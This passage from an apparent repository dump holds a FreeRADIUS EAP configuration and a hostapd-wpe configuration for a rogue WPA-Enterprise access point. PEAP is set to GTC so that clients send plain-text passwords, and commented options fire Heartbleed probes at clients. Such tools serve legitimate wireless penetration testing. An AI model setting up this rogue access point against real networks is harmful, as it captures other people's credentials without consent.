56 | # more byte than it should.
57 | #
58 | # We can work around it by configurably adding an extra
59 | # zero byte.
60 | cisco_accounting_username_bug = no
61 |
62 | #
63 | # Help prevent DoS attacks by limiting the number of
64 | # sessions that the server is tracking. Most systems
65 | # can handle ~30 EAP sessions/s, so the default limit
66 | # of 4096 should be OK.
67 | max_sessions = 4096
68 |
69 | # Supported EAP-types
70 |
71 | #
72 | # We do NOT recommend using EAP-MD5 authentication
73 | # for wireless connections. It is insecure, and does
74 | # not provide for dynamic WEP keys.
75 | #
76 | md5 {
77 | }
78 |
79 | # Cisco LEAP
80 | #
81 | # We do not recommend using LEAP in new deployments. See:
82 | # http://www.securiteam.com/tools/5TP012ACKE.html
83 | #
84 | # Cisco LEAP uses the MS-CHAP algorithm (but not
85 | # the MS-CHAP attributes) to perform it's authentication.
86 | #
87 | # As a result, LEAP *requires* access to the plain-text
88 | # User-Password, or the NT-Password attributes.
89 | # 'System' authentication is impossible with LEAP.
90 | #
91 | leap {
92 | }
93 |
94 | # Generic Token Card.
95 | #
96 | # Currently, this is only permitted inside of EAP-TTLS,
97 | # or EAP-PEAP. The module "challenges" the user with
98 | # text, and the response from the user is taken to be
99 | # the User-Password.
100 | #
101 | # Proxying the tunneled EAP-GTC session is a bad idea,
102 | # the users password will go over the wire in plain-text,
103 | # for anyone to see.
104 | #
105 | gtc {
106 | # The default challenge, which many clients
107 | # ignore..
108 | #challenge = "Password: "
109 |
110 | # The plain-text response which comes back
111 | # is put into a User-Password attribute,
112 | # and passed to another module for
113 | # authentication. This allows the EAP-GTC
114 | # response to be checked against plain-text,
115 | # or crypt'd passwords.
116 | #
117 | # If you say "Local" instead of "PAP", then
118 | # the module will look for a User-Password
119 | # configured for the request, and do the
120 | # authentication itself.
121 | #
122 | auth_type = PAP
123 | }
124 |
125 | ## EAP-TLS
126 | #
127 | # See raddb/certs/README for additional comments
128 | # on certificates.
129 | #
130 | # If OpenSSL was not found at the time the server was
131 | # built, the "tls", "ttls", and "peap" sections will
132 | # be ignored.
133 | #
134 | # Otherwise, when the server first starts in debugging
135 | # mode, test certificates will be created. See the
136 | # "make_cert_command" below for details, and the README
137 | # file in raddb/certs
138 | #
139 | # These test certificates SHOULD NOT be used in a normal
140 | # deployment. They are created only to make it easier
141 | # to install the server, and to perform some simple
142 | # tests with EAP-TLS, TTLS, or PEAP.
143 | #
144 | # See also:
145 | #
146 | # http://www.dslreports.com/forum/remark,9286052~mode=flat
147 | #
148 | # Note that you should NOT use a globally known CA here!
149 | # e.g. using a Verisign cert as a "known CA" means that
150 | # ANYONE who has a certificate signed by them can
151 | # authenticate via EAP-TLS! This is likely not what you want.
152 | tls {
153 | #
154 | # These is used to simplify later configurations.
155 | #
156 | certdir = ${confdir}/certs
157 | cadir = ${confdir}/certs
158 |
159 | private_key_password = whatever
160 | private_key_file = ${certdir}/server.pem
161 |
162 | # If Private key & Certificate are located in
163 | # the same file, then private_key_file &
164 | # certificate_file must contain the same file
165 | # name.
166 | #
167 | # If CA_file (below) is not used, then the
168 | # certificate_file below MUST include not
169 | # only the server certificate, but ALSO all
170 | # of the CA certificates used to sign the
171 | # server certificate.
172 | certificate_file = ${certdir}/server.pem
173 |
174 | # Trusted Root CA list
175 | #
176 | # ALL of the CA's in this list will be trusted
177 | # to issue client certificates for authentication.
178 | #
179 | # In general, you should use self-signed
180 | # certificates for 802.1x (EAP) authentication.
181 | # In that case, this CA file should contain
182 | # *one* CA certificate.
183 | #
184 | # This parameter is used only for EAP-TLS,
185 | # when you issue client certificates. If you do
186 | # not use client certificates, and you do not want
187 | # to permit EAP-TLS authentication, then delete
188 | # this configuration item.
189 | CA_file = ${cadir}/ca.pem
190 |
191 | #
192 | # For DH cipher suites to work, you have to
193 | # run OpenSSL to create the DH file first:
194 | #
195 | # openssl dhparam -out certs/dh 1024
196 | #
197 | dh_file = ${certdir}/dh
198 | random_file = ${certdir}/random
199 |
200 | #
201 | # This can never exceed the size of a RADIUS
202 | # packet (4096 bytes), and is preferably half
203 | # that, to accomodate other attributes in
204 | # RADIUS packet. On most APs the MAX packet
205 | # length is configured between 1500 - 1600
206 | # In these cases, fragment size should be
207 | # 1024 or less.
208 | #
209 | # fragment_size = 1024
210 |
211 | # include_length is a flag which is
212 | # by default set to yes If set to
213 | # yes, Total Length of the message is
214 | # included in EVERY packet we send.
215 | # If set to no, Total Length of the
216 | # message is included ONLY in the
217 | # First packet of a fragment series.
218 | #
219 | # include_length = yes
220 |
221 | # Check the Certificate Revocation List
222 | #
223 | # 1) Copy CA certificates and CRLs to same directory.
224 | # 2) Execute 'c_rehash '.
225 | # 'c_rehash' is OpenSSL's command.
226 | # 3) uncomment the line below.
227 | # 5) Restart radiusd
228 | # check_crl = yes
229 | CA_path = ${cadir}
230 |
231 | #
232 | # If check_cert_issuer is set, the value will
233 | # be checked against the DN of the issuer in
234 | # the client certificate. If the values do not
235 | # match, the cerficate verification will fail,
236 | # rejecting the user.
237 | #
238 | # In 2.1.10 and later, this check can be done
239 | # more generally by checking the value of the
240 | # TLS-Client-Cert-Issuer attribute. This check
241 | # can be done via any mechanism you choose.
242 | #
243 | # check_cert_issuer = "/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd"
244 |
245 | #
246 | # If check_cert_cn is set, the value will
247 | # be xlat'ed and checked against the CN
248 | # in the client certificate. If the values
249 | # do not match, the certificate verification
250 | # will fail rejecting the user.
251 | #
252 | # This check is done only if the previous
253 | # "check_cert_issuer" is not set, or if
254 | # the check succeeds.
255 | #
256 | # In 2.1.10 and later, this check can be done
257 | # more generally by checking the value of the
258 | # TLS-Client-Cert-CN attribute. This check
259 | # can be done via any mechanism you choose.
260 | #
261 | # check_cert_cn = %{User-Name}
262 | #
263 | # Set this option to specify the allowed
264 | # TLS cipher suites. The format is listed
265 | # in "man 1 ciphers".
266 | cipher_list = "DEFAULT"
267 |
268 | #
269 |
270 | # This command creates the initial "snake oil"
271 | # certificates when the server is run as root,
272 | # and via "radiusd -X".
273 | #
274 | # As of 2.1.11, it *also* checks the server
275 | # certificate for validity, including expiration.
276 | # This means that radiusd will refuse to start
277 | # when the certificate has expired. The alternative
278 | # is to have the 802.1X clients refuse to connect
279 | # when they discover the certificate has expired.
280 | #
281 | # Debugging client issues is hard, so it's better
282 | # for the server to print out an error message,
283 | # and refuse to start.
284 | #
285 | make_cert_command = "${certdir}/bootstrap"
286 |
287 | #
288 | # Elliptical cryptography configuration
289 | #
290 | # Only for OpenSSL >= 0.9.8.f
291 | #
292 | ecdh_curve = "prime256v1"
293 |
294 | #
295 | # Session resumption / fast reauthentication
296 | # cache.
297 | #
298 | # The cache contains the following information:
299 | #
300 | # session Id - unique identifier, managed by SSL
301 | # User-Name - from the Access-Accept
302 | # Stripped-User-Name - from the Access-Request
303 | # Cached-Session-Policy - from the Access-Accept
304 | #
305 | # The "Cached-Session-Policy" is the name of a
306 | # policy which should be applied to the cached
307 | # session. This policy can be used to assign
308 | # VLANs, IP addresses, etc. It serves as a useful
309 | # way to re-apply the policy from the original
310 | # Access-Accept to the subsequent Access-Accept
311 | # for the cached session.
312 | #
313 | # On session resumption, these attributes are
314 | # copied from the cache, and placed into the
315 | # reply list.
316 | #
317 | # You probably also want "use_tunneled_reply = yes"
318 | # when using fast session resumption.
319 | #
320 | cache {
321 | #
322 | # Enable it. The default is "no".
323 | # Deleting the entire "cache" subsection
324 | # Also disables caching.
325 | #
326 | # You can disallow resumption for a
327 | # particular user by adding the following
328 | # attribute to the control item list:
329 | #
330 | # Allow-Session-Resumption = No
331 | #
332 | # If "enable = no" below, you CANNOT
333 | # enable resumption for just one user
334 | # by setting the above attribute to "yes".
335 | #
336 | enable = no
337 |
338 | #
339 | # Lifetime of the cached entries, in hours.
340 | # The sessions will be deleted after this
341 | # time.
342 | #
343 | lifetime = 24 # hours
344 |
345 | #
346 | # The maximum number of entries in the
347 | # cache. Set to "0" for "infinite".
348 | #
349 | # This could be set to the number of users
350 | # who are logged in... which can be a LOT.
351 | #
352 | max_entries = 255
353 | }
354 |
355 | #
356 | # As of version 2.1.10, client certificates can be
357 | # validated via an external command. This allows
358 | # dynamic CRLs or OCSP to be used.
359 | #
360 | # This configuration is commented out in the
361 | # default configuration. Uncomment it, and configure
362 | # the correct paths below to enable it.
363 | #
364 | verify {
365 | # A temporary directory where the client
366 | # certificates are stored. This directory
367 | # MUST be owned by the UID of the server,
368 | # and MUST not be accessible by any other
369 | # users. When the server starts, it will do
370 | # "chmod go-rwx" on the directory, for
371 | # security reasons. The directory MUST
372 | # exist when the server starts.
373 | #
374 | # You should also delete all of the files
375 | # in the directory when the server starts.
376 | # tmpdir = /tmp/radiusd
377 |
378 | # The command used to verify the client cert.
379 | # We recommend using the OpenSSL command-line
380 | # tool.
381 | #
382 | # The ${..CA_path} text is a reference to
383 | # the CA_path variable defined above.
384 | #
385 | # The %{TLS-Client-Cert-Filename} is the name
386 | # of the temporary file containing the cert
387 | # in PEM format. This file is automatically
388 | # deleted by the server when the command
389 | # returns.
390 | # client = "/path/to/openssl verify -CApath ${..CA_path} %{TLS-Client-Cert-Filename}"
391 | }
392 |
393 | #
394 | # OCSP Configuration
395 | # Certificates can be verified against an OCSP
396 | # Responder. This makes it possible to immediately
397 | # revoke certificates without the distribution of
398 | # new Certificate Revokation Lists (CRLs).
399 | #
400 | ocsp {
401 | #
402 | # Enable it. The default is "no".
403 | # Deleting the entire "ocsp" subsection
404 | # Also disables ocsp checking
405 | #
406 | enable = no
407 |
408 | #
409 | # The OCSP Responder URL can be automatically
410 | # extracted from the certificate in question.
411 | # To override the OCSP Responder URL set
412 | # "override_cert_url = yes".
413 | #
414 | override_cert_url = yes
415 |
416 | #
417 | # If the OCSP Responder address is not
418 | # extracted from the certificate, the
419 | # URL can be defined here.
420 |
421 | #
422 | # Limitation: Currently the HTTP
423 | # Request is not sending the "Host: "
424 | # information to the web-server. This
425 | # can be a problem if the OCSP
426 | # Responder is running as a vhost.
427 | #
428 | url = "http://127.0.0.1/ocsp/"
429 | }
430 | }
431 |
432 | # The TTLS module implements the EAP-TTLS protocol,
433 | # which can be described as EAP inside of Diameter,
434 | # inside of TLS, inside of EAP, inside of RADIUS...
435 | #
436 | # Surprisingly, it works quite well.
437 | #
438 | # The TTLS module needs the TLS module to be installed
439 | # and configured, in order to use the TLS tunnel
440 | # inside of the EAP packet. You will still need to
441 | # configure the TLS module, even if you do not want
442 | # to deploy EAP-TLS in your network. Users will not
443 | # be able to request EAP-TLS, as it requires them to
444 | # have a client certificate. EAP-TTLS does not
445 | # require a client certificate.
446 | #
447 | # You can make TTLS require a client cert by setting
448 | #
449 | # EAP-TLS-Require-Client-Cert = Yes
450 | #
451 | # in the control items for a request.
452 | #
453 | ttls {
454 | # The tunneled EAP session needs a default
455 | # EAP type which is separate from the one for
456 | # the non-tunneled EAP module. Inside of the
457 | # TTLS tunnel, we recommend using EAP-MD5.
458 | # If the request does not contain an EAP
459 | # conversation, then this configuration entry
460 | # is ignored.
461 | default_eap_type = md5
462 |
463 | # The tunneled authentication request does
464 | # not usually contain useful attributes
465 | # like 'Calling-Station-Id', etc. These
466 | # attributes are outside of the tunnel,
467 | # and normally unavailable to the tunneled
468 | # authentication request.
469 | #
470 | # By setting this configuration entry to
471 | # 'yes', any attribute which NOT in the
472 | # tunneled authentication request, but
473 | # which IS available outside of the tunnel,
474 | # is copied to the tunneled request.
475 | #
476 | # allowed values: {no, yes}
477 | copy_request_to_tunnel = no
478 |
479 | # The reply attributes sent to the NAS are
480 | # usually based on the name of the user
481 | # 'outside' of the tunnel (usually
482 | # 'anonymous'). If you want to send the
483 | # reply attributes based on the user name
484 | # inside of the tunnel, then set this
485 | # configuration entry to 'yes', and the reply
486 | # to the NAS will be taken from the reply to
487 | # the tunneled request.
488 | #
489 | # allowed values: {no, yes}
490 | use_tunneled_reply = no
491 |
492 | #
493 | # The inner tunneled request can be sent
494 | # through a virtual server constructed
495 | # specifically for this purpose.
496 | #
497 | # If this entry is commented out, the inner
498 | # tunneled request will be sent through
499 | # the virtual server that processed the
500 | # outer requests.
501 | #
502 | virtual_server = "inner-tunnel"
503 |
504 | # This has the same meaning as the
505 | # same field in the "tls" module, above.
506 | # The default value here is "yes".
507 | # include_length = yes
508 | }
509 |
510 | ##################################################
511 | #
512 | # !!!!! WARNINGS for Windows compatibility !!!!!
513 | #
514 | ##################################################
515 | #
516 | # If you see the server send an Access-Challenge,
517 | # and the client never sends another Access-Request,
518 | # then
519 | #
520 | # STOP!
521 | #
522 | # The server certificate has to have special OID's
523 | # in it, or else the Microsoft clients will silently
524 | # fail. See the "scripts/xpextensions" file for
525 | # details, and the following page:
526 | #
527 | # http://support.microsoft.com/kb/814394/en-us
528 | #
529 | # For additional Windows XP SP2 issues, see:
530 | #
531 | # http://support.microsoft.com/kb/885453/en-us
532 | #
533 | #
534 | # If is still doesn't work, and you're using Samba,
535 | # you may be encountering a Samba bug. See:
536 | #
537 | # https://bugzilla.samba.org/show_bug.cgi?id=6563
538 | #
539 | # Note that we do not necessarily agree with their
540 | # explanation... but the fix does appear to work.
541 | #
542 | ##################################################
543 |
544 | #
545 | # The tunneled EAP session needs a default EAP type
546 | # which is separate from the one for the non-tunneled
547 | # EAP module. Inside of the TLS/PEAP tunnel, we
548 | # recommend using EAP-MS-CHAPv2.
549 | #
550 | # The PEAP module needs the TLS module to be installed
551 | # and configured, in order to use the TLS tunnel
552 | # inside of the EAP packet. You will still need to
553 | # configure the TLS module, even if you do not want
554 | # to deploy EAP-TLS in your network. Users will not
555 | # be able to request EAP-TLS, as it requires them to
556 | # have a client certificate. EAP-PEAP does not
557 | # require a client certificate.
558 | #
559 | #
560 | # You can make PEAP require a client cert by setting
561 | #
562 | # EAP-TLS-Require-Client-Cert = Yes
563 | #
564 | # in the control items for a request.
565 | #
566 | peap {
567 | # The tunneled EAP session needs a default
568 | # EAP type which is separate from the one for
569 | # the non-tunneled EAP module. Inside of the
570 | # PEAP tunnel, we recommend using MS-CHAPv2,
571 | # as that is the default type supported by
572 | # Windows clients.
573 | #default_eap_type = mschapv2
574 | default_eap_type = gtc
575 |
576 | # the PEAP module also has these configuration
577 | # items, which are the same as for TTLS.
578 | copy_request_to_tunnel = no
579 | use_tunneled_reply = no
580 |
581 | # When the tunneled session is proxied, the
582 | # home server may not understand EAP-MSCHAP-V2.
583 | # Set this entry to "no" to proxy the tunneled
584 | # EAP-MSCHAP-V2 as normal MSCHAPv2.
585 | # proxy_tunneled_request_as_eap = yes
586 |
587 | #
588 | # The inner tunneled request can be sent
589 | # through a virtual server constructed
590 | # specifically for this purpose.
591 | #
592 | # If this entry is commented out, the inner
593 | # tunneled request will be sent through
594 | # the virtual server that processed the
595 | # outer requests.
596 | #
597 | virtual_server = "inner-tunnel"
598 |
599 | # This option enables support for MS-SoH
600 | # see doc/SoH.txt for more info.
601 | # It is disabled by default.
602 | #
603 | # soh = yes
604 |
605 | #
606 | # The SoH reply will be turned into a request which
607 | # can be sent to a specific virtual server:
608 | #
609 | # soh_virtual_server = "soh-server"
610 | }
611 |
612 | #
613 | # This takes no configuration.
614 | #
615 | # Note that it is the EAP MS-CHAPv2 sub-module, not
616 | # the main 'mschap' module.
617 | #
618 | # Note also that in order for this sub-module to work,
619 | # the main 'mschap' module MUST ALSO be configured.
620 | #
621 | # This module is the *Microsoft* implementation of MS-CHAPv2
622 | # in EAP. There is another (incompatible) implementation
623 | # of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
624 | # currently support.
625 | #
626 | mschapv2 {
627 | # Prior to version 2.1.11, the module never
628 | # sent the MS-CHAP-Error message to the
629 | # client. This worked, but it had issues
630 | # when the cached password was wrong. The
631 | # server *should* send "E=691 R=0" to the
632 | # client, which tells it to prompt the user
633 | # for a new password.
634 | #
635 | # The default is to behave as in 2.1.10 and
636 | # earlier, which is known to work. If you
637 | # set "send_error = yes", then the error
638 | # message will be sent back to the client.
639 | # This *may* help some clients work better,
640 | # but *may* also cause other clients to stop
641 | # working.
642 | #
643 | # send_error = no
644 | }
645 | }
--------------------------------------------------------------------------------
/files/hostapd_wpe/hostapd-wpe.conf:
--------------------------------------------------------------------------------
1 | #
2 | # hostapd-wpe.conf
3 | # Brad Antoniewicz (@brad_anton) - Foundstone
4 | # ------------------------------------------------
5 | #
6 | # Configuration file for hostapd-wpe
7 | #
8 | # General Options - Likely to need to be changed if you're using this
9 |
10 | # Interface - Probably wlanX for 802.11, eth0 for wired
11 | interface=wlan0
12 |
13 | # Driver - comment this out if 802.11
14 | #driver=wired
15 |
16 | # May have to change these depending on build location
17 | eap_user_file=hostapd-wpe.eap_user
18 | ca_cert=certs/ca.pem
19 | server_cert=certs/server.pem
20 | private_key=certs/server.pem
21 | private_key_passwd=whatever
22 | dh_file=certs/dh
23 |
24 | # 802.11 Options - Uncomment all if 802.11
25 | ssid=SSID_name
26 | hw_mode=g
27 | channel=1
28 |
29 | # WPE Options - Dont need to change these to make it all work
30 | #
31 | # wpe_logfile=somefile # (Default: ./hostapd-wpe.log)
32 | # wpe_hb_send_before_handshake=0 # Heartbleed True/False (Default: 1)
33 | # wpe_hb_send_before_appdata=0 # Heartbleed True/False (Default: 0)
34 | # wpe_hb_send_after_appdata=0 # Heartbleed True/False (Default: 0)
35 | # wpe_hb_payload_size=0 # Heartbleed 0-65535 (Default: 50000)
36 | # wpe_hb_num_repeats=0 # Heartbleed 0-65535 (Default: 1)
37 | # wpe_hb_num_tries=0 # Heartbleed 0-65535 (Default: 1)
38 |
39 |
40 | # Dont mess with unless you know what you're doing
41 | eap_server=1
42 | eap_fast_a_id=101112131415161718191a1b1c1d1e1f
43 | eap_fast_a_id_info=hostapd-wpe
44 | eap_fast_prov=3
45 | ieee8021x=1
46 | pac_key_lifetime=604800
47 | pac_key_refresh_time=86400
48 | pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f
49 | wpa=1
50 | wpa_key_mgmt=WPA-EAP
51 | wpa_pairwise=TKIP CCMP
52 |
53 |
54 |
55 | ##############################################################################
56 | # Everything below this line is just the standard hostapd.conf for reference
57 | # default options are set, variables set above are commented out
58 | ###############################################################################
59 |
60 |
61 |
62 |
63 |
64 | ##### hostapd configuration file ##############################################
65 | # Empty lines and lines starting with # are ignored
66 |
67 | # AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
68 | # management frames); ath0 for madwifi
69 | #interface=wlan0
70 |
71 | # In case of madwifi, atheros, and nl80211 driver interfaces, an additional
72 | # configuration parameter, bridge, may be used to notify hostapd if the
73 | # interface is included in a bridge. This parameter is not used with Host AP
74 | # driver. If the bridge parameter is not set, the drivers will automatically
75 | # figure out the bridge interface (assuming sysfs is enabled and mounted to
76 | # /sys) and this parameter may not be needed.
77 | #
78 | # For nl80211, this parameter can be used to request the AP interface to be
79 | # added to the bridge automatically (brctl may refuse to do this before hostapd
80 | # has been started to change the interface mode). If needed, the bridge
81 | # interface is also created.
82 | #bridge=br0
83 |
84 | # Driver interface type (hostap/wired/madwifi/test/none/nl80211/bsd);
85 | # default: hostap). nl80211 is used with all Linux mac80211 drivers.
86 | # Use driver=none if building hostapd as a standalone RADIUS server that does
87 | # not control any wireless/wired driver.
88 | # driver=hostap
89 |
90 | # hostapd event logger configuration
91 | #
92 | # Two output method: syslog and stdout (only usable if not forking to
93 | # background).
94 | #
95 | # Module bitfield (ORed bitfield of modules that will be logged; -1 = all
96 | # modules):
97 | # bit 0 (1) = IEEE 802.11
98 | # bit 1 (2) = IEEE 802.1X
99 | # bit 2 (4) = RADIUS
100 | # bit 3 (8) = WPA
101 | # bit 4 (16) = driver interface
102 | # bit 5 (32) = IAPP
103 | # bit 6 (64) = MLME
104 | #
105 | # Levels (minimum value for logged events):
106 | # 0 = verbose debugging
107 | # 1 = debugging
108 | # 2 = informational messages
109 | # 3 = notification
110 | # 4 = warning
111 | #
112 | logger_syslog=-1
113 | logger_syslog_level=2
114 | logger_stdout=-1
115 | logger_stdout_level=2
116 |
117 | # Interface for separate control program. If this is specified, hostapd
118 | # will create this directory and a UNIX domain socket for listening to requests
119 | # from external programs (CLI/GUI, etc.) for status information and
120 | # configuration. The socket file will be named based on the interface name, so
121 | # multiple hostapd processes/interfaces can be run at the same time if more
122 | # than one interface is used.
123 | # /var/run/hostapd is the recommended directory for sockets and by default,
124 | # hostapd_cli will use it when trying to connect with hostapd.
125 | ctrl_interface=/var/run/hostapd
126 |
127 | # Access control for the control interface can be configured by setting the
128 | # directory to allow only members of a group to use sockets. This way, it is
129 | # possible to run hostapd as root (since it needs to change network
130 | # configuration and open raw sockets) and still allow GUI/CLI components to be
131 | # run as non-root users. However, since the control interface can be used to
132 | # change the network configuration, this access needs to be protected in many
133 | # cases. By default, hostapd is configured to use gid 0 (root). If you
134 | # want to allow non-root users to use the contron interface, add a new group
135 | # and change this value to match with that group. Add users that should have
136 | # control interface access to this group.
137 | #
138 | # This variable can be a group name or gid.
139 | #ctrl_interface_group=wheel
140 | ctrl_interface_group=0
141 |
142 |
143 | ##### IEEE 802.11 related configuration #######################################
144 |
145 | # SSID to be used in IEEE 802.11 management frames
146 | #ssid=test
147 | # Alternative formats for configuring SSID
148 | # (double quoted string, hexdump, printf-escaped string)
149 | #ssid2="test"
150 | #ssid2=74657374
151 | #ssid2=P"hello\nthere"
152 |
153 | # UTF-8 SSID: Whether the SSID is to be interpreted using UTF-8 encoding
154 | #utf8_ssid=1
155 |
156 | # Country code (ISO/IEC 3166-1). Used to set regulatory domain.
157 | # Set as needed to indicate country in which device is operating.
158 | # This can limit available channels and transmit power.
159 | #country_code=US
160 |
161 | # Enable IEEE 802.11d. This advertises the country_code and the set of allowed
162 | # channels and transmit power levels based on the regulatory limits. The
163 | # country_code setting must be configured with the correct country for
164 | # IEEE 802.11d functions.
165 | # (default: 0 = disabled)
166 | #ieee80211d=1
167 |
168 | # Enable IEEE 802.11h. This enables radar detection and DFS support if
169 | # available. DFS support is required on outdoor 5 GHz channels in most countries
170 | # of the world. This can be used only with ieee80211d=1.
171 | # (default: 0 = disabled)
172 | #ieee80211h=1
173 |
174 | # Add Power Constraint element to Beacon and Probe Response frames
175 | # This config option adds Power Constraint element when applicable and Country
176 | # element is added. Power Constraint element is required by Transmit Power
177 | # Control. This can be used only with ieee80211d=1.
178 | # Valid values are 0..255.
179 | #local_pwr_constraint=3
180 |
181 | # Set Spectrum Management subfield in the Capability Information field.
182 | # This config option forces the Spectrum Management bit to be set. When this
183 | # option is not set, the value of the Spectrum Management bit depends on whether
184 | # DFS or TPC is required by regulatory authorities. This can be used only with
185 | # ieee80211d=1 and local_pwr_constraint configured.
186 | #spectrum_mgmt_required=1
187 |
188 | # Operation mode (a = IEEE 802.11a, b = IEEE 802.11b, g = IEEE 802.11g,
189 | # ad = IEEE 802.11ad (60 GHz); a/g options are used with IEEE 802.11n, too, to
190 | # specify band)
191 | # Default: IEEE 802.11b
192 | #hw_mode=g
193 |
194 | # Channel number (IEEE 802.11)
195 | # (default: 0, i.e., not set)
196 | # Please note that some drivers do not use this value from hostapd and the
197 | # channel will need to be configured separately with iwconfig.
198 | #
199 | # If CONFIG_ACS build option is enabled, the channel can be selected
200 | # automatically at run time by setting channel=acs_survey or channel=0, both of
201 | # which will enable the ACS survey based algorithm.
202 | #channel=1
203 |
204 | # ACS tuning - Automatic Channel Selection
205 | # See: http://wireless.kernel.org/en/users/Documentation/acs
206 | #
207 | # You can customize the ACS survey algorithm with following variables:
208 | #
209 | # acs_num_scans requirement is 1..100 - number of scans to be performed that
210 | # are used to trigger survey data gathering of an underlying device driver.
211 | # Scans are passive and typically take a little over 100ms (depending on the
212 | # driver) on each available channel for given hw_mode. Increasing this value
213 | # means sacrificing startup time and gathering more data wrt channel
214 | # interference that may help choosing a better channel. This can also help fine
215 | # tune the ACS scan time in case a driver has different scan dwell times.
216 | #
217 | # Defaults:
218 | #acs_num_scans=5
219 |
220 | # Channel list restriction. This option allows hostapd to select one of the
221 | # provided channels when a channel should be automatically selected. This
222 | # is currently only used for DFS when the current channels becomes unavailable
223 | # due to radar interference, and is currently only useful when ieee80211h=1 is
224 | # set.
225 | # Default: not set (allow any enabled channel to be selected)
226 | #chanlist=100 104 108 112 116
227 |
228 | # Beacon interval in kus (1.024 ms) (default: 100; range 15..65535)
229 | beacon_int=100
230 |
231 | # DTIM (delivery traffic information message) period (range 1..255):
232 | # number of beacons between DTIMs (1 = every beacon includes DTIM element)
233 | # (default: 2)
234 | dtim_period=2
235 |
236 | # Maximum number of stations allowed in station table. New stations will be
237 | # rejected after the station table is full. IEEE 802.11 has a limit of 2007
238 | # different association IDs, so this number should not be larger than that.
239 | # (default: 2007)
240 | max_num_sta=255
241 |
242 | # RTS/CTS threshold; 2347 = disabled (default); range 0..2347
243 | # If this field is not included in hostapd.conf, hostapd will not control
244 | # RTS threshold and 'iwconfig wlan# rts ' can be used to set it.
245 | rts_threshold=2347
246 |
247 | # Fragmentation threshold; 2346 = disabled (default); range 256..2346
248 | # If this field is not included in hostapd.conf, hostapd will not control
249 | # fragmentation threshold and 'iwconfig wlan# frag ' can be used to set
250 | # it.
251 | fragm_threshold=2346
252 |
253 | # Rate configuration
254 | # Default is to enable all rates supported by the hardware. This configuration
255 | # item allows this list be filtered so that only the listed rates will be left
256 | # in the list. If the list is empty, all rates are used. This list can have
257 | # entries that are not in the list of rates the hardware supports (such entries
258 | # are ignored). The entries in this list are in 100 kbps, i.e., 11 Mbps = 110.
259 | # If this item is present, at least one rate have to be matching with the rates
260 | # hardware supports.
261 | # default: use the most common supported rate setting for the selected
262 | # hw_mode (i.e., this line can be removed from configuration file in most
263 | # cases)
264 | #supported_rates=10 20 55 110 60 90 120 180 240 360 480 540
265 |
266 | # Basic rate set configuration
267 | # List of rates (in 100 kbps) that are included in the basic rate set.
268 | # If this item is not included, usually reasonable default set is used.
269 | #basic_rates=10 20
270 | #basic_rates=10 20 55 110
271 | #basic_rates=60 120 240
272 |
273 | # Short Preamble
274 | # This parameter can be used to enable optional use of short preamble for
275 | # frames sent at 2 Mbps, 5.5 Mbps, and 11 Mbps to improve network performance.
276 | # This applies only to IEEE 802.11b-compatible networks and this should only be
277 | # enabled if the local hardware supports use of short preamble. If any of the
278 | # associated STAs do not support short preamble, use of short preamble will be
279 | # disabled (and enabled when such STAs disassociate) dynamically.
280 | # 0 = do not allow use of short preamble (default)
281 | # 1 = allow use of short preamble
282 | #preamble=1
283 |
284 | # Station MAC address -based authentication
285 | # Please note that this kind of access control requires a driver that uses
286 | # hostapd to take care of management frame processing and as such, this can be
287 | # used with driver=hostap or driver=nl80211, but not with driver=madwifi.
288 | # 0 = accept unless in deny list
289 | # 1 = deny unless in accept list
290 | # 2 = use external RADIUS server (accept/deny lists are searched first)
291 | macaddr_acl=0
292 |
293 | # Accept/deny lists are read from separate files (containing list of
294 | # MAC addresses, one per line). Use absolute path name to make sure that the
295 | # files can be read on SIGHUP configuration reloads.
296 | #accept_mac_file=/etc/hostapd.accept
297 | #deny_mac_file=/etc/hostapd.deny
298 |
299 | # IEEE 802.11 specifies two authentication algorithms. hostapd can be
300 | # configured to allow both of these or only one. Open system authentication
301 | # should be used with IEEE 802.1X.
302 | # Bit fields of allowed authentication algorithms:
303 | # bit 0 = Open System Authentication
304 | # bit 1 = Shared Key Authentication (requires WEP)
305 | auth_algs=3
306 |
307 | # Send empty SSID in beacons and ignore probe request frames that do not
308 | # specify full SSID, i.e., require stations to know SSID.
309 | # default: disabled (0)
310 | # 1 = send empty (length=0) SSID in beacon and ignore probe request for
311 | # broadcast SSID
312 | # 2 = clear SSID (ASCII 0), but keep the original length (this may be required
313 | # with some clients that do not support empty SSID) and ignore probe
314 | # requests for broadcast SSID
315 | ignore_broadcast_ssid=0
316 |
317 | # Additional vendor specfic elements for Beacon and Probe Response frames
318 | # This parameter can be used to add additional vendor specific element(s) into
319 | # the end of the Beacon and Probe Response frames. The format for these
320 | # element(s) is a hexdump of the raw information elements (id+len+payload for
321 | # one or more elements)
322 | #vendor_elements=dd0411223301
323 |
324 | # TX queue parameters (EDCF / bursting)
325 | # tx_queue__
326 | # queues: data0, data1, data2, data3, after_beacon, beacon
327 | # (data0 is the highest priority queue)
328 | # parameters:
329 | # aifs: AIFS (default 2)
330 | # cwmin: cwMin (1, 3, 7, 15, 31, 63, 127, 255, 511, 1023)
331 | # cwmax: cwMax (1, 3, 7, 15, 31, 63, 127, 255, 511, 1023); cwMax >= cwMin
332 | # burst: maximum length (in milliseconds with precision of up to 0.1 ms) for
333 | # bursting
334 | #
335 | # Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e):
336 | # These parameters are used by the access point when transmitting frames
337 | # to the clients.
338 | #
339 | # Low priority / AC_BK = background
340 | #tx_queue_data3_aifs=7
341 | #tx_queue_data3_cwmin=15
342 | #tx_queue_data3_cwmax=1023
343 | #tx_queue_data3_burst=0
344 | # Note: for IEEE 802.11b mode: cWmin=31 cWmax=1023 burst=0
345 | #
346 | # Normal priority / AC_BE = best effort
347 | #tx_queue_data2_aifs=3
348 | #tx_queue_data2_cwmin=15
349 | #tx_queue_data2_cwmax=63
350 | #tx_queue_data2_burst=0
351 | # Note: for IEEE 802.11b mode: cWmin=31 cWmax=127 burst=0
352 | #
353 | # High priority / AC_VI = video
354 | #tx_queue_data1_aifs=1
355 | #tx_queue_data1_cwmin=7
356 | #tx_queue_data1_cwmax=15
357 | #tx_queue_data1_burst=3.0
358 | # Note: for IEEE 802.11b mode: cWmin=15 cWmax=31 burst=6.0
359 | #
360 | # Highest priority / AC_VO = voice
361 | #tx_queue_data0_aifs=1
362 | #tx_queue_data0_cwmin=3
363 | #tx_queue_data0_cwmax=7
364 | #tx_queue_data0_burst=1.5
